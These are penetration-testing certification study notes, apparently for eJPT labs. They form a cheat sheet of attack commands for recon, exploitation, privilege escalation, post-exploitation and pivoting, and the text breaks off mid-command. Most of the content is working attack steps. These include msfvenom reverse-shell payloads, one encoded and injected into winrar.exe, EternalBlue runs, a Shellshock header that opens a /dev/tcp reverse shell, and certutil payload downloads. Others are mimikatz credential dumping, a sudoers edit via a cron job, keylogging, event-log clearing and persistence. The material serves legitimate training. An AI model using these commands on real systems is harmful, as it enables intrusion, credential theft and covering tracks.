EJPT Notes
Assessment Methodologies Passive Information Gathering Website Recon & Footprinting IP Addresses host <domain> Directories robots.txt sitemap.xml Names Emails Phone Numbers Physical Addresses Web Technologies Used BuiltWith → Firefox Addon (Recommended) Wappalyzer → Extension whatweb <domain> → Linux Tool webhttrack → Website Copier Whois Enumeration https://who.is website whois <domain> Website Footprinting with Netcraft https://netcraft.com DNS Recon dnsrecon -d <domain> → Kali Linux Tool https://dnsdumpster.com/ WAF wafw00f Subdomain Enumeration Sublist3r Google Dorks cache:ine.com Exploit-DB Dorks Email Harvesting theHarvester Leaked Password Databases HaveIBeenPwned? Active Information Gathering DNS Zone Transfer /etc/hosts → Local DNS dnsenum dig fierce nmap netdiscover Footprinting & Scanning Active Information Gathering Host Discovery Techniques Ping Sweeps → ICMP Echo Requests → Tool: fping fping -a -g 10.10.23.0/24 ARP Scanning TCP SYN Ping → Half-Open Scan UDP Ping TCP ACK Ping SYN-ACK Ping → Sends SYN-ACK packets NMAP Scripts → /usr/share/nmap/scripts/ Firewall/IDS Evasion -f → Fragments IP packets -D → Decoy -Pn vs -sn -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets → to identify targets -Pn Types of Scans: TCP Connect Scans (-sT) SYN “Half-open” Scans (-sS) UDP Scans (-sU) TCP Null Scans (-sN) → sent with no flags set at all As per the RFC, the target host should respond with a RST if the port is closed. TCP FIN Scans (-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection) Nmap expects a RST if the port is closed. TCP Xmas Scans (-sX) → send a malformed TCP packet and expects a RST response for closed ports. If a UDP port doesn’t respond to an Nmap scan, it will be marked as open|filtered NULL, FIN and Xmas → Firewall Evasion Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port Zenmap: Green → Machine is alive Red → Machine is alive but not responding or not directly accessible Yellow → We have launched the scan (that is, the attacker machine) and it has plotted the other hosts connection with hostname and IP addresses to localhost. nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery FFUF You could also use any custom keyword instead of FUZZ, you just need to define it like this wordlist.txt:KEYWORD ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ generic list of files such as raft-medium-files-lowercase.txt ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt To hide the progress: 2>/dev/null Directories: ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt By adding -fc 403 (filter code) we’ll hide from the output all 403 HTTP status codes. -mc 200 → Only shows 200 -fr → Filter regexp Audit https://cisofy.com/lynis/ Penetration Testing Windows Vulnerabilities Windos IIS - Port 80, 443 WebDAV - Port 80, 443 SMB/CIFS - Port 445 RDP - Port 3389 WinRM - Port 5986/443 Exploit - WebDAV IIS nmap -sV -p 80 --script=http-enum <target> hydra -L <username-list> -P <password-list> <target> http-get /webdav/ davtest -auth user:password -url <url> cadaver <url> → Enter username & password put <webshell-path> Webshells → /usr/share/webshells dir C:/ & type C:/<filepath> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp service postgresql start && msfconsole use multi/handler → Use to setup a listener for payload you created with msfvenom set payload windows/meterpreter/reverse_tcp show options set LHOST & LPORT & Run Exploit - SMB : PSExec nmap -sV -sC <target> scanner/smb/smb_login psexec.py [email protected] Usernames: /usr/share/metasploit/data/wordlists/common_users.txt exploit/windows/smb/psexec Exploit - SMB : Eternal Blue(MS17-010) https://github.com/3ndG4me/AutoBlue-MS17-010 cd Shellcode ./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless nc -lvnp 1234 python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin Method 2 : Metasploit use windows/smb/ms17_010_eternalblue Exploit - RDP use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDP hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT> xfreerdp /u:<username> /p:<password> /v:<target>:<port> Exploit - WinRM Port → 5985 crackmapexec winrm <target-ip> -u <username> -p <wordlist-path> crackmapexec winrm <target> -u <username> -p <password> -x <command> evil-winrm.rb -u <username> -p <password> -i <target> use exploit/windows/winrm/winrm_script_exec set FORCE_VBS true set username & password exploit > use auxiliary/scanner/winrm/winrm_auth_methods > use auxiliary/scanner/winrm/winrm_login > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt > set VERBOSE false > use use auxiliary/scanner/winrm/winrm_cmd > set USERNAME administrator > set PASSWORD tinkerbell > set cmd whoami > run > use exploit/windows/winrm/winrm_script_exec > set USERNAME <> > set PASSWORD <> > set LHOST <IP> > set FORCE_VBS true > run > sysinfo Privilege Escalation Windows Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester Copy sysinfo to a txt file ./windows-exploit-suggester.py --update ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file> Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits Download the specific exploit Upload this exploit using Meterpreter shell → .\<exploit>.exe Meterpreter → getsystem → Escalate Privileges use multi/recon/local_exploit_suggester → To find out vulnerable exploits Exploit - UAC UAC → User Access Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS It ensures that changes to the IS require approval from admin or a user account that is part of admin group https://github.com/hfiref0x/UACME net users net localgroup administrators use exploit/windows/http/rejetoo_hfs_exec pgrep explorer → Digit migrate <digit> → Change x86 to x64 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe upload backdoor.exe upload /root/Desktop/Tools/UACME/Akagi64.exe .\Akagi64.exe 23 C:\Temp\backdoor.exe Enumeration Importing Nmap results into MSF service postgresql start msfconsole msf> db_status msf> workspace msf> workspace -a <name> // Create a new workspace msf> db_import <path_to_file> msf> hosts // Check whether the data imported successfully msf> services // Check whether the data imported successfully msf> db_nmap -Pn -sV -o 10.4.22.173 // Results will be saved in MSF DB Port Scanning with Auxiliary Modules service postgresql start msfconsole msf> workspace -a portscan msf> search portscan msf> use <module_name> / <index> // scanner/portscan/tcp msf> show options msf> set RHOSTS 192.168.100.43 // TARGET IP msf> curl <> // If HTTP is open msf> search xoda msf> use <index/module_name> msf> show options msf> set RHOSTS <TARGET IP> msf> set TARGETURI / -> // Set the path where service is hosted msf> exploit // It will give meterpreter session mp> sysinfo // Target Infomation mp> shell // Open shell session bash> ifconfig // Identify next target address (x.x.x.x+1) bash> exit // CTRL + C mp> run autoroute -s <IP> // IP of one of the machine in subnet -> Add route mp> background // Will take this session in Background msf> sessions // View current sessions msf> search portscan msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1) msf> run msf> back msf> search udp_sweep ERROR: [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? SOLUTION: SET LHOST <BASE_MACHINE_IP> // Attacker IP FTP Enumeration msf> search type:auxiliary name:ftp msf> use auxiliary/scanner/ftp/ftp_version msf> use auxiliary/scanner/ftp/ftp_login msf> set RHOSTS <IP> msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt msf> run msf> use auxiliary/scanner/ftp/anonymous SMB Enumeration msf> setg RHOSTS <IP> // Setting a Global variable msf> search type:auxiliary name:smb msf> use auxiliary/scanner/smb/smb_version msf> use auxiliary/scanner/smb/smb_enumusers msf> info // See info about module msf> use auxiliary/scanner/smb/smb_enumshares msf> set ShowFiles true msf> use auxiliary/scanner/smb/smb_login msf> set SMB_USER admin msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt bash> smbclient -L \\\\<IP>\\ -U admin // -L: List all shares bash> smbclient \\\\<IP>\\<share> -U admin // Replace share name Web Server Enumeration msf> setg RHOSTS <IP> msf> setg RHOST <IP> msf> search type:auxiliary name:http msf> use auxiliary/scanner/http/http_version msf> use auxiliary/scanner/http/http_header msf> use auxiliary/scanner/http/robots_txt msf> use auxiliary/scanner/http/dir_scanner msf> use auxiliary/scanner/http/files_dir msf> use auxiliary/scanner/http/http_login msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials msf> unset USERPASS_FILE msf> run msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt msf> set VERBOSE false msf> run msf> use auxiliary/scanner/http/apache_userdir_enum msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt msf> echo "<username>" > user.txt msf> use auxiliary/scanner/http/http_login msf> set USER_FILE /root/user.txt MySQL Enumeration // MySQL - TCP Port 3306 msf> use auxiliary/scanner/mysql/mysql_version msf> use use auxiliary/scanner/mysql/mysql_login msf> set USERNAME root msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt msf> set VERBOSE false msf> run // It will bruteforce passwords // auxiliary/admin/ -> This admin modules requires credentials msf> use auxiliary/admin/mysql/mysql_enum msf> set PASSWORD <password> // This module requires creds msf> set USERNAME root msf> run msf> use auxiliary/admin/mysql/mysql_sql msf> set USERNAME root msf> set PASSWORD <password> msf> set SQL show databases; msf> use auxiliary/scanner/mysql/mysql_schemadump msf> set USERNAME root msf> set PASSWORD <password> bash> mysql -h <IP> -u root -p SSH Enumeration msf> search type:auxiliary name:ssh msf> use auxiliary/scanner/ssh/ssh_version msf> use auxiliary/scanner/ssh/ssh_login // Password Auth msf> use auxiliary/scanner/ssh/ssh_version_pubkey // Key-Pair Auth msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt msf> sessions <number> msf> /bin/bash -i bash> ls msf> use auxiliary/scanner/ssh/ssh_enumusers msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt SMTP Enumeration msf> search type:auxiliary name:smtp msf> use auxiliary/scanner/smtp/smtp_version msf> use auxiliary/scanner/smtp/smtp_enum Vulnerability Assessment Frequently Exploited Windows Services Microsoft IIS → Port 80/443 → Web Server WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server SMB/CIFS → Port 445 → Network File Sharing Protocol RDP → Port 3389 → Remotely authenticate & interact with Windows system WinRM → Port 5986/443 → Windows remote management protocol MSF Vulnerability Scanning bash> searchsploit "Microsoft Windows SMB" bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit" metasploit-autopwn > wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb > mv db_autopwn.db /usr/share/metasploit-framework/ > load db_autopwn (msf) > db_autopwn -p -t > db_autopwn -p -t -PI 445 > analyze MS17-010 SMB Vulnerability (EternalBlue Exploit) EternalBlue → Collection of Windows Vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows System Affected Versions Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016 > nmap -sV -p 445 -O <IP> > nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP> > git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git > cd <DIR> > pip install -r requirement.txt > cd shellcode && chmod +x shell_prep.sh > ./shell_prep.sh // 1. Type Y 2. Enter LHOST IP 3. Enter LHOST port 4. Type 1(Regular CMD Shell) 5. Type 1 (Stageless payload) -> sc_x86.bin / sc_x64.bin > cd .. > chmod +x eternalblue_exploit7.py > nc -nvlp 1234 > python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin // Method 2 msf> search eternalblue msf> use exploit/windows/smb/ms17_010_eternalblue msf> set RHOSTS <IP> BlueKeep (Windows CVE-2019-0708 RDP Vulnerability) Allow attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of > sudo nmap -p <IP> msf> search BlueKeep msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep msf> set RHOSTS <IP> msf> run msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf> set RHOSTS msf> exlpoit PassTheHash Attack msf> service postgresql start && msfconsole msf> search badblue msf> use exploit/windows/http/badblue_passthru msf> set RHOSTS <IP> msf> exploit mp> pgrep lsass mp> migrate 780 mp> getuid mp> load kiwi mp> lsa_dump_sam // Administrative NTLM Creds msf> use exploit/windows/smb/psexec msf> set LPORT <PORT> msf> set RHOSTS <IP> msf> set SMBUser Administrator msf> set SMBPass <LMHash>:<NTLM Hash> msf> set target Native\ upload msf> exploit // Method 2 > crackmapexec smb <IP> -u Administrator -H <NTLM Hash> > crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig" Shellshock (Bash CVE-2014-6271 Vulnerability) Allows an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell. > nmap -sV <IP> > nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" > > Capture this request in Burp > User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd' > nc -nvlp 1234 > User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1' msf> search shellshock msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec msf> set RHOSTS <IP> msf> set TARGETURI /gettime.cgi msf> exploit Vulnerability Scanning Nessus sudo dpkg -i Nessus.deb // Download from Nessus Website sudo systemctl start nessusd.service WMAP msf> setg RHOSTS <IP> msf> load wmap msf> wmap_sites -a <IP> msf> wmap_targets -t http://<IP> msf> wmap_sites -l msf> wmap_targets -l msf> wmap_run -t msf> Windows Privilege Escalation Windows Kernel Exploits Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits msf> getsystem // command to run privilege escalation msf> use post/multi/recon/local_exploit_suggester msf> set SESSION <Number> msf> run Bypassing User Account Control (UAC) In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system. UACMe: https://github.com/hfiref0x/UACME > net users > net localgroup administrators > setg RHOSTS <IP> > search rejetto > run > sysinfo // 32-bit mp session > pgrep explorer > migrate <ID> > sysinfo // 64-bit mp session > shell > net user > net localgroup administrators > // MSF : UACME > use multi/handler > set payload windows/meterpreter/reverse_tcp > set LHOST <IP> > set LPORT <Port> > run // Create Payload > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe 'backdoor.exe' // Continue Previous Session > pwd > getuid > getprivs > cd C:\\ > mkdir temp > cd temp > upload backdoor.exe > upload /root/Desktop/tools/UACME/Akagi64.exe > shell > dir > Akagi63.exe 23 C:\\temp\backdoor.exe It will connect to lister > getuid > getprivs > getsystem > hashdump Access Control Impersonation Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system. Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process. Privileges: SeAssignPrimaryToken: This allows a user to impersonate tokens SeCreateToken: This allows a user to create an arbitrary token with an administrative privileges. SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges. > nmap <IP> > search rejetto > set RHOSTS <IP> > exploit > sysinfo > pgrep explorer > migrate <ID> > getuid > getprivs > use incognito > list_tokens -u > impersonate_token <Name> > getuid > pgrep explorer > migrate <ID> Alternate Data Streams (ADS) ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS Any file created on an NTFS drive will have two different forks/streams: Data Stream → Default stream that contains data of the file Resource Stream → Typically contains metadata of the file Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection Unattended Windows Setup Config Files: C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Autounattend.xml > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe > python -m SimpleHTTPServer 80 // Windows > cd Desktop > certutil -urlcache -f http://<Kali>/payload.exe payload.exe > msfconsole > use multi/handler > set payload windows/x64/meterpreter/reverse_tcp > set LHOST <IP> > set LPORT 1234 > run // Execute the payload in Windows > search -f unattend.xml > cd C:\\Windows\\Panther > download unattend.xml > vim password.txt > base64 -d password.txt > psexec.py Administrator@<IP> // Enter password // Windows: runas.exe /user:Administrator cmd // Enter password Dumping Hashes with Mimikatz Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickers from memory. > nmap -sV <IP> > msfconsole > search badblue > use exploit/windows/http/badblue_passthru > set RHOSTS <IP> > exploit > sysinfo > getuid > pgrep lsass > migrate <ID> > getuid > load kiwi > ? // Help Menu > creds_all // Dump all creds > lsa_dump_sam > lsa_dump_secrets > cd C:\\ > mkdir Temp > cd Temp > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe > shell > dir > mimikatz.exe > privilege::debug > lsadump::sam > lsadump::secrets > sekurlsa::logonpasswords Linux Exploits FTP > nmap -sV <IP> > ftp <IP> // Check anonymous login > hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp > searchsploit proftpd SSH > hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh SAMBA SAMBA is a Linux implementation of SMB SAMBA allows Windows systems to access Linux shares & devices > nmap -sV <IP> > hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb > smbmap -H <IP> -u admin -p <password> > smbclient -L <IP> -U admin > smbclient //<IP>/shawn -U admin > ? > dir > smbclient //<IP>/nancy -U admin > get flag > ls > cat flag > smbclient //<IP>/admin -U admin > tar xzf flag.tar.gz > cat flag > enum4linux -a <IP> > enum4linux -a -u admin -p <password> <IP> Linux Privilege Escalation Linux Kernel Exploits Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester > sysinfo > getuid > shell > /bin/bash -i > cat /etc/passwd > // Quick Download: Linux Exploit Suggester > chmod +x les.sh > ./les.sh > Misconfigured Cron Jobs Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the the cron job > whoami > groups <user> > cat /etc/passwd > crontab -l // List crontab for current user > ls -la > cd / > grep -rnw /usr -e "/home/student/message" > cat /tmp/message > ls -la /usr/local/share/copy.sh > cat /usr/local/share/copy.sh > printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh > sudo su SUID Binaries SUID → Set Owner User ID permission This permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions. The provision of elevate privileges is limited to the execution of the script & does not translate to elevation of privileges. > whoami > groups <user> > ls -la > file welcome > strings welcome > rm greetings > cp /bin/bash greetings > ./welcome > cat /etc/shadow Dumping Linux Password Hashes Prefix: $1 → MD5 $2 → Blowfish $5 → SHA-256 $6 → SHA-512 > nmap -sV <IP> > searchsploit proftpd > setg RHOSTS <IP> > search proftpd > use exploit/unix/ftp/proftpd_133c_backdoor > show options > set payload payload/cmd/unix/reverse > exploit > /bin/bash -i > id > // Go in background > sessions > session -u 1 > sysinfo > getuid > cat /etc/shadow // Get hash > use post/linux/gather/hashdump > show options > set SESSION 2 > run // Crack hash > use auxiliary/analyze/crack_linux > set SHA512 true > run Network-Based Attacks Firewall Detection & IDS Evasion > nmap -Pn -sS -F <IP> // -F -> Fast Scan > nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment Packets SMB & NetBIOS Enumeration NetBIOS → API & a set of network protocol providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources. > cat /etc/hosts > ping demo.ine.local // reachable IP1 > ping demo1.ine.local // not reachable IP2 > nmap demo.ine.local > nbtscan > whatis nbtscan > nbtscan <IP/Subnet> > nbtscan > nmblookup -A <IP1> > nmap -sU -p 137 <IP1> > nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1> > nmap -sV -p 139,445 demo.ine.local > ls -la /usr/share/nmap/scripts/ | grep -e "smb-*" > nmap -p445 --script smb-protocols demo.ine.local > nmap -p445 --script smb-security-mode demo.ine.local > smbclient -L demo.ine.local // testing for anonymous access -> press enter > nmap -p445 --script smb-enum-users demo.ine.local > nano users.txt // enter all usernames > hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb > psexec.py [email protected] > whoami // MSF > search psexec > use exploit/windows/smb/psexec > set SMBUser <username> > set SMBPass <password> > set payload windows/x64/meterpreter/reverse_tcp > exploit > sysinfo > shell > ping <IP2> // Exit > run autoroute -s <IP2/Subnet> // /20 -> Meterpreter > background > seach socks > use auxiliary/server/socks_proxy > set VERSION 4a // cat /etc/proxychains4 > set SRVPORT <ProxychainPort> > run > netstat -antp // Machine 1 > proxychains nmap demo1.ine.local -sT -Pn -sV -p 445 // MSF > shell > net view <IP2> > background > migrate -N explorer.exe > shell > net view <IP2> > net use D: \\<IP2>\Documents > net use K: \\<IP2>\K$ > dir D: > SNMP Enumeration > cat /etc/hosts > nmap -sU -sV -p 161 demo.ine.local > ls -la /usr/share/nmap/scripts | grep -e "snmp-*" > ls -la /usr/share/nmap/nselib/data/ | grep snmp > nmap -sU -p 161 --script=snmp-brute demo.ine.local > snmpwalk -v 1 -c public demo.ine.local > nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc. > hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb > SMB Relay Attack It is type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions > search smb_relay > use exploit/windows/smb/smb_relay > set SRVHOST <IP> // Kali Linux IP - ifconfig > set LHOST <IP> // Kali Linux IP - ifconfig > set SMBHOST <IP> // Check lab docs > // New Tab > echo "<Kali-IP> *.sportsfoo" > dns > dsnspoof -i eth1 -f dns > Metasploit MSFVenom x86 → 32 bit > msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe > msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe > msfvenom --list formats > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf // SHELLCODE // -i -> Iterations // -e -> Encoding // -x -> Inject in file // -k -> Keep original behavior of file (ex. winrar.exe) > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe // MSF Scripts > msfconsole -r handler.rc > HTTP File Server (HFS) > db_nmap -sS -sV -O <IP> > search type:exploit name:rejetto > use exploit/windows/http/rejetto_hfs_exec > set RHOSTS <IP> > exploit // 32-bit session > set payload windows/x64/meterpreter/reverse_tcp > exploit // 64-bit session Apache Tomcat Java Server > setg RHOSTS <IP> > db_nmap -sS -sV -O <IP> > services > search type:exploit tomcat_jsp > use exploit/multi/http/tomcat_jsp_upload_bypass > set payload java/jsp_shell_bind_tcp > set LHOST & LPORT > set SHELL cmd > exploit > background the session > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe> meterpreter.exe > sudo python -m SimpleHTTPServer 80 > sessions 1 > certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe > dir // Continue > nano handler.rc > use multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST <Kali-IP> > set LPORT 1234 > run > SAVE THE FILE > msfconsole -r handler.rc > .\meterpreter.exe // Resume after running handler.rc > sysinfo > getuid FTP Server > setg RHOSTS <IP> > db_nmap -sS -sV -O <IP> > services > analyze > search vsftpd > use exploit/unix/ftp/vsftpd+234_backdoor > exploit > background > sessions > search shell_to_meterpreter > use post/multi/manage/shell_to_meterpreter > set LHOST <kali-ip> > set LHOST eth1 > set SESSION <ID> > run > sessions 2 > sysinfo SAMBA : File Sharing Service > setg RHOSTS <IP> > db_nmap -sS -sV -O <IP> > search type:exploit name:samba > use exploit/linux/samba/is_known_pipename > check // check it it's vulnerable > run > ls / pwd > background > search shell_to_meterpreter > use post/multi/manage/shell_to_meterpreter > set LHOST eth1 > set SESSION <ID> > run > sessions 2 > sysinfo SSH > setg RHSOTS <IP> > db_nmap -sS -sV -O <IP> > search libssh_auth_bypass > use auxiliary/scanner/ssh/libssh_auth_bypass > set SPAWN_PTY true > run > session 1 > > background > search shell_to_meterpreter > use post/multi/manage/shell_to_meterpreter > set LHOST eth1 > set SESSION <ID> > run > sessions 2 SMTP > setg RHSOTS <IP> > db_nmap -sV -O <IP> > search type:exploit name:haraka > use exploit/linux/smtp/haraka > set SRVPORT 9898 > set email_to [email protected] > set payload linux/x64/meterpreter_reverse_http > set LHOST eth1 Meterpreter > edit flag1 // Text Editor > download flag1 > checksum md5 /bin/bash > getenv PATH > search -d /usr/bin -f *backdoor* > search -f *.jpg > search -f *.php > shell > ps // Runnning Processes > migrate <pid> > session -u 1 // Upgrade shell to Meterpreter session Windows Post Exploitation Modules > setg RHOSTS <IP> > db_nmap -sV <IP> > search rejetto > use exploit/windows/http/rejetto_hfs_exec > run > getsystem // elevate privileges > getuid > hashdump > show_mount > ps // list process > migrate <pid> > search win_privs > use post/windows/gather/win_privs > set SESSION <id> > run > search enum_logged > use post/windows/gather/enum_logged_on_users > set SESSION <id> > run > search checkvm > use post/windows/gather/checkvm > set SESSION <id> > run > search enum_applications > use post/windows/gather/enum_applications > set SESSION <id> > run > loot // Store results in DB > use post/windows/gather/windows_av_excluded > set SESSION 1 > run > search enum_computer > use post/windows/gather/enum_computers > search enum_patches > use post/windows/gather/enum_patches > use post/windows/gather/enum_shares > use post/windows/manage/enable_rdp > set SESSION <id> > run UAC Bypass > use exploit/windows/http/rejetto_hfs_exec > set payload windows/x64/meterpreter/reverse_tcp > set LHOST eth1 > exploit > sysinfo > getuid > getsystem > getprivs > shell > net users > net localgroup administrators > background > search bypassuac > use exploit/windows/local/bypassuac_injection > set payload windows/x64/meterpreter/reverse_tcp > set SESSION 1 > set LPORT 1234 > run > set TARGET Windows\ x64 > run > getsystem > hashdump Token Impersonation With Incognito > use exploit/windows/http/rejetto_hfs_exec > set payload windows/x64/meterpreter/reverse_tcp > set LHOST eth1 > exploit > sysinfo > getprivs > load incognito > list_tokens -u > impersonate_token "ATTACKDEFENSE\Administrator" > getuid > migrate <> > getuid Windows Persistence > use exploit/windows/http/rejetto_hfs_exec > set payload windows/x64/meterpreter/reverse_tcp > set LHOST eth1 > exploit > background > search platform:windows name:persistence > use exploit/windows/local/persistence_service > set payload windows/x64/meterpreter/reverse_tcp > set SESSION 1 > exploit > set payload windows/meterpreter/reverse_tcp > exploit > sysinfo > sessions -K > use multi/handler > set LHOST eth1 > run Enabling RDP > use exploit/windows/http/badblue_passthru > set RHOSTS > set target Badblue\ EE\ 2.7\ Universal > exploit > background > search enable_rdp > use post/windows/manage/enable_rdp > set SESSION 1 > exploit > db_nmap -sV -p 3389 <IP> > shell > net user administrator hacker_123321 // Change Password > xfreerdp /u:administrator /p:hacker_123321 /v:<IP> Windows Keylogging > use exploit/windows/http/badblue_passthru > exploit > pgrep explorer > migrate <ID> > keyscan_start > keyscan_dump Clearing Windows Event Logs > use exploit/windows/http/badblue_passthru > exploit > clearev // Deletes Event Logs Windows Pivoting > use exploit/windows/http/rejetto_hfs_exec > exploit > sysinfo > ipconfig // Copy the IP which is from same subnet : Victim 2 > run autoroute -s <IP>/<range> (Range-20) > background > use auxiliary/scanner/portscan/tcp > set RHOSTS <Victim2> > set PORTS 1-100 > exploit > sessions 1 > portfwd add -l 1234 -p 80 -r <Victim-2-Ip> > background > db_nmap -sS -sV -p 1234 localhost > use exploit/windows/http/badblue_passthru > set payload windows/meterpreter/bind_tcp > set RHOSTS <V-2-Ip> > set LPORT 4433 > exploit > sysinfo Linux Post Exploitation Post-Exploitation Modules > search samba > use exploit/linux/samba/is_known_pipename > set RHOSTS <IP> > exploit > pwd > background > sessions -u 1 > sessions 2 > sysinfo > getuid > shell > /bin/bash -i > whoami > uname -r > uname -a > ifconfig > ip a s > netstat -antp > ps aux > env > terminate > sessions -u 1 > search enum_configs > set SESSION <Meterpreter> > run > loot > serach env platform:linux > use post/multi/gather/env > set SESSION <id> > run > search enum_network > use post/linux/gather/enum_network > set SESSION <id> > run > search enum_protections > set SESSION <id> > run > notes > search enum_system > set SESSION <id> > run > serach checkcontainer > set SESSION <id> > run > search enum_users_history > set SESSION <id> > run Linux Privilege Escalation > setg RHOSTS <IP> > search ssh_login > use auxiliary/scanner/ssh/ssh_login > set USERNAME jackie > set 